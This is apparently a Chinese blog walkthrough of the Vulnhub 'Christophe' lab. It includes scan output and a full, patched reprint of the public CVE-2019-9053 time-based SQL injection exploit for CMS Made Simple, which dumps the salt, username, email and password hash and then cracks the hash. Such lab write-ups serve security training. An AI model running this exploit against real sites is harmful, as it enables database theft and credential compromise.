Christophe
识别目标主机IP地址
(kali㉿kali)-[~/Vulnhub/christophe]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:8e:b3:52 1 60 PCS Systemtechnik GmbH
192.168.56.108 08:00:27:ef:e0:1d 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.108
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/christophe]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.108 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-29 20:22 EST
Nmap scan report for 192.168.56.108
Host is up (0.000090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 1411d18b120b78be044f740d34a5fa07 (RSA)
| 256 476972f9b77633586feb8d1cda9eb5c6 (ECDSA)
|_ 256 790859b0dfec13319ed824541db62744 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-generator: CMS Made Simple - Copyright (C) 2004-2018. All rights reserved.
|_http-title: Home - Viva La Resistance!
MAC Address: 08:00:27:EF:E0:1D (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.42 seconds
-
NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)
-
目标主机的CMS: CMS Made Simple, 版本未知。
获得Shell
浏览器访问80端口,得知:
-
CMS版本为:2.2.7
-
出现用户名:Christophe
┌──(kali㉿kali)-[~/Vulnhub/christophe]
└─$ nikto -h http://192.168.56.108
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.108
+ Target Hostname: 192.168.56.108
+ Target Port: 80
+ Start Time: 2023-01-29 20:30:22 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie CMSSESSID5406484e3678 created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-3092: /lib/: This might be interesting...
+ OSVDB-3268: /tmp/: Directory indexing found.
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /admin/login.php: Admin login page/section found.
+ 7921 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2023-01-29 20:31:16 (GMT-5) (54 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
nikto工具运行结果表明:
- 有/admin管理员管理界面,初步尝试了一下弱密码,失败,也没有简单的SQL注入绕过漏洞。
┌──(kali㉿kali)-[~/Vulnhub/christophe]
└─$ gobuster dir -u http://192.168.56.108 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.108
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/01/29 20:33:35 Starting gobuster in directory enumeration mode
===============================================================
/modules (Status: 301) [Size: 318] [--> http://192.168.56.108/modules/]
/uploads (Status: 301) [Size: 318] [--> http://192.168.56.108/uploads/]
/doc (Status: 301) [Size: 314] [--> http://192.168.56.108/doc/]
/admin (Status: 301) [Size: 316] [--> http://192.168.56.108/admin/]
/assets (Status: 301) [Size: 317] [--> http://192.168.56.108/assets/]
/install (Status: 301) [Size: 318] [--> http://192.168.56.108/install/]
/lib (Status: 301) [Size: 314] [--> http://192.168.56.108/lib/]
/tmp (Status: 301) [Size: 314] [--> http://192.168.56.108/tmp/]
/server-status (Status: 403) [Size: 302]
Progress: 217763 / 220561 (98.73%)===============================================================
2023/01/29 20:33:57 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/christophe]
└─$ gobuster dir -u http://192.168.56.108 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.js,.sh,.html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.108
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: txt,js,sh,html,php
[+] Timeout: 10s
===============================================================
2023/01/29 20:35:25 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 294]
/.php (Status: 403) [Size: 293]
/index.php (Status: 200) [Size: 20320]
/modules (Status: 301) [Size: 318] [--> http://192.168.56.108/modules/]
/uploads (Status: 301) [Size: 318] [--> http://192.168.56.108/uploads/]
/doc (Status: 301) [Size: 314] [--> http://192.168.56.108/doc/]
/admin (Status: 301) [Size: 316] [--> http://192.168.56.108/admin/]
/assets (Status: 301) [Size: 317] [--> http://192.168.56.108/assets/]
/install (Status: 301) [Size: 318] [--> http://192.168.56.108/install/]
/lib (Status: 301) [Size: 314] [--> http://192.168.56.108/lib/]
/config.php (Status: 200) [Size: 0]
/tmp (Status: 301) [Size: 314] [--> http://192.168.56.108/tmp/]
/.php (Status: 403) [Size: 293]
/.html (Status: 403) [Size: 294]
/server-status (Status: 403) [Size: 302]
Progress: 1320016 / 1323366 (99.75%)===============================================================
2023/01/29 20:37:59 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/christophe]
└─$ dirb http://192.168.56.108
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Jan 29 20:38:44 2023
URL_BASE: http://192.168.56.108/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.108/ ----
==> DIRECTORY: http://192.168.56.108/admin/
==> DIRECTORY: http://192.168.56.108/assets/
==> DIRECTORY: http://192.168.56.108/doc/
+ http://192.168.56.108/index.php (CODE:200|SIZE:20320)
==> DIRECTORY: http://192.168.56.108/install/
==> DIRECTORY: http://192.168.56.108/lib/
==> DIRECTORY: http://192.168.56.108/modules/
+ http://192.168.56.108/server-status (CODE:403|SIZE:302)
==> DIRECTORY: http://192.168.56.108/tmp/
==> DIRECTORY: http://192.168.56.108/uploads/
---- Entering directory: http://192.168.56.108/admin/ ----
+ http://192.168.56.108/admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.108/admin/lang/
==> DIRECTORY: http://192.168.56.108/admin/plugins/
==> DIRECTORY: http://192.168.56.108/admin/templates/
==> DIRECTORY: http://192.168.56.108/admin/themes/
---- Entering directory: http://192.168.56.108/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.108/doc/ ----
+ http://192.168.56.108/doc/index.html (CODE:200|SIZE:24)
+ http://192.168.56.108/doc/robots.txt (CODE:200|SIZE:121)
---- Entering directory: http://192.168.56.108/install/ ----
+ http://192.168.56.108/install/index.php (CODE:500|SIZE:0)
---- Entering directory: http://192.168.56.108/lib/ ----
==> DIRECTORY: http://192.168.56.108/lib/assets/
==> DIRECTORY: http://192.168.56.108/lib/classes/
+ http://192.168.56.108/lib/index.html (CODE:200|SIZE:24)
==> DIRECTORY: http://192.168.56.108/lib/jquery/
==> DIRECTORY: http://192.168.56.108/lib/lang/
==> DIRECTORY: http://192.168.56.108/lib/phpmailer/
==> DIRECTORY: http://192.168.56.108/lib/plugins/
==> DIRECTORY: http://192.168.56.108/lib/smarty/
==> DIRECTORY: http://192.168.56.108/lib/tasks/
---- Entering directory: http://192.168.56.108/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.108/tmp/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.108/uploads/ ----
==> DIRECTORY: http://192.168.56.108/uploads/images/
+ http://192.168.56.108/uploads/index.html (CODE:200|SIZE:0)
---- Entering directory: http://192.168.56.108/admin/lang/ ----
+ http://192.168.56.108/admin/lang/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.56.108/admin/plugins/ ----
+ http://192.168.56.108/admin/plugins/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.56.108/admin/templates/ ----
+ http://192.168.56.108/admin/templates/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.56.108/admin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.108/lib/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.108/lib/classes/ ----
+ http://192.168.56.108/lib/classes/index.html (CODE:200|SIZE:24)
==> DIRECTORY: http://192.168.56.108/lib/classes/internal/
---- Entering directory: http://192.168.56.108/lib/jquery/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.108/lib/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.108/lib/phpmailer/ ----
+ http://192.168.56.108/lib/phpmailer/index.html (CODE:200|SIZE:24)
==> DIRECTORY: http://192.168.56.108/lib/phpmailer/language/
+ http://192.168.56.108/lib/phpmailer/LICENSE (CODE:200|SIZE:26421)
---- Entering directory: http://192.168.56.108/lib/plugins/ ----
+ http://192.168.56.108/lib/plugins/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.56.108/lib/smarty/ ----
+ http://192.168.56.108/lib/smarty/index.html (CODE:200|SIZE:24)
==> DIRECTORY: http://192.168.56.108/lib/smarty/plugins/
---- Entering directory: http://192.168.56.108/lib/tasks/ ----
+ http://192.168.56.108/lib/tasks/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.56.108/uploads/images/ ----
+ http://192.168.56.108/uploads/images/index.html (CODE:200|SIZE:0)
---- Entering directory: http://192.168.56.108/lib/classes/internal/ ----
+ http://192.168.56.108/lib/classes/internal/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.56.108/lib/phpmailer/language/ ----
+ http://192.168.56.108/lib/phpmailer/language/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.56.108/lib/smarty/plugins/ ----
+ http://192.168.56.108/lib/smarty/plugins/index.html (CODE:200|SIZE:24)
-----------------
END_TIME: Sun Jan 29 20:39:08 2023
DOWNLOADED: 83016 - FOUND: 21
目录扫描工具没有给出更多有价值的信息。
┌──(kali㉿kali)-[~/Vulnhub/christophe]
└─$ searchsploit CMS Made Simple 2.2.7
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------- ---------------------------------
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution | php/webapps/45793.py
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
─(kali㉿kali)-[~/Vulnhub/christophe]
└─$ python exploit.py -u http://192.168.56.108 -w /usr/share/wordlists/rockyou.txt --crack
[+] Salt for password found: 932129a6bd8545bd
[+] Username found: christophe
[+] Email found: [email protected]
[*] Try: 7908b1494f82ed320b288a0e839bfbc5$
[*] Now try to crack password
Traceback (most recent call last):
File "/home/kali/Vulnhub/christophe/exploit.py", line 184, in <module>
crack_password()
File "/home/kali/Vulnhub/christophe/exploit.py", line 53, in crack_password
for line in dict.readlines():
File "/usr/lib/python3.10/codecs.py", line 322, in decode
(result, consumed) = self._buffer_decode(data, self.errors, final)
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xf1 in position 933: invalid continuation byte
在读取字典rockyou时出错,看来需要继续修改exploit.py
运行程序,又出现另一个错误:
[+] Salt for password found: 932129a6bd8545bd
[+] Username found: christophe
[+] Email found: [email protected]
[+] Password found: 7908b1494f82ed320b288a0e839bfbc5
[*] Try: 123456
Traceback (most recent call last):
File "/home/kali/Vulnhub/christophe/exploit.py", line 191, in <module>
crack_password()
File "/home/kali/Vulnhub/christophe/exploit.py", line 63, in crack_password
if hashlib.md5(str(salt) + line).hexdigest() == password:
TypeError: Strings must be encoded before hashing
修改程序后,仍然没有破解出密码:
#!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053
import requests
from termcolor import colored
import time
from termcolor import cprint
import optparse
import hashlib
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)
options, args = parser.parse_args()
if not options.url:
print("[+] Specify an url target")
print("[+] Example usage (no cracking password): exploit.py -u http://target-uri")
print("[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist")
print("[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.")
exit()
url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
session = requests.Session()
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
flag = True
password = ""
temp_password = ""
TIME = 1
db_name = ""
output = ""
email = ""
salt = ''
wordlist = ""
if options.wordlist:
wordlist += options.wordlist
def crack_password():
global password
global output
global wordlist
global salt
dict = open(wordlist)
while True:
try:
line = dict.readline()
except:
continue
if len(line)== 0:
break
line = line.replace("\n", "")
beautify_print_try(line)
md = hashlib.md5()
md.update((str(salt)+line).encode('utf-8'))
print("Try word: %s"%line)
if md.hexdigest() == password:
output += "\n[+] Password cracked: " + line
break
dict.close()
def beautify_print_try(value):
global output
print("\033c")
cprint(output,'green', attrs=['bold'])
cprint('[*] Try: ' + value, 'red', attrs=['bold'])
def beautify_print():
global output
print("\033c")
cprint(output,'green', attrs=['bold'])
def dump_salt():
global flag
global salt
global output
ord_salt = ""
ord_salt_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_salt = salt + dictionary[i]
ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_salt)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
salt = temp_salt
ord_salt = ord_salt_temp
flag = True
output += '\n[+] Salt for password found: ' + salt
def dump_password():
global flag
global password
global output
ord_password = ""
ord_password_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_password = password + dictionary[i]
ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_password)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
password = temp_password
ord_password = ord_password_temp
flag = True
output += '\n[+] Password found: ' + password
def dump_username():
global flag
global db_name
global output
ord_db_name = ""
ord_db_name_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_db_name = db_name + dictionary[i]
ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_db_name)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
db_name = temp_db_name
ord_db_name = ord_db_name_temp
output += '\n[+] Username found: ' + db_name
flag = True
def dump_email():
global flag
global email
global output
ord_email = ""
ord_email_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_email = email + dictionary[i]
ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_email)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
email = temp_email
ord_email = ord_email_temp
output += '\n[+] Email found: ' + email
flag = True
dump_salt()
dump_username()
dump_email()
dump_password()
if options.cracking:
print(colored("[*] Now try to crack password"))
crack_password()
beautify_print()
至此只得到用户名和密码(加密后的值)
标签:----,shell,http,Christophe,lib,192.168,56.108,Vulnhub,directory From: https://www.cnblogs.com/jason-huawen/p/17075077.html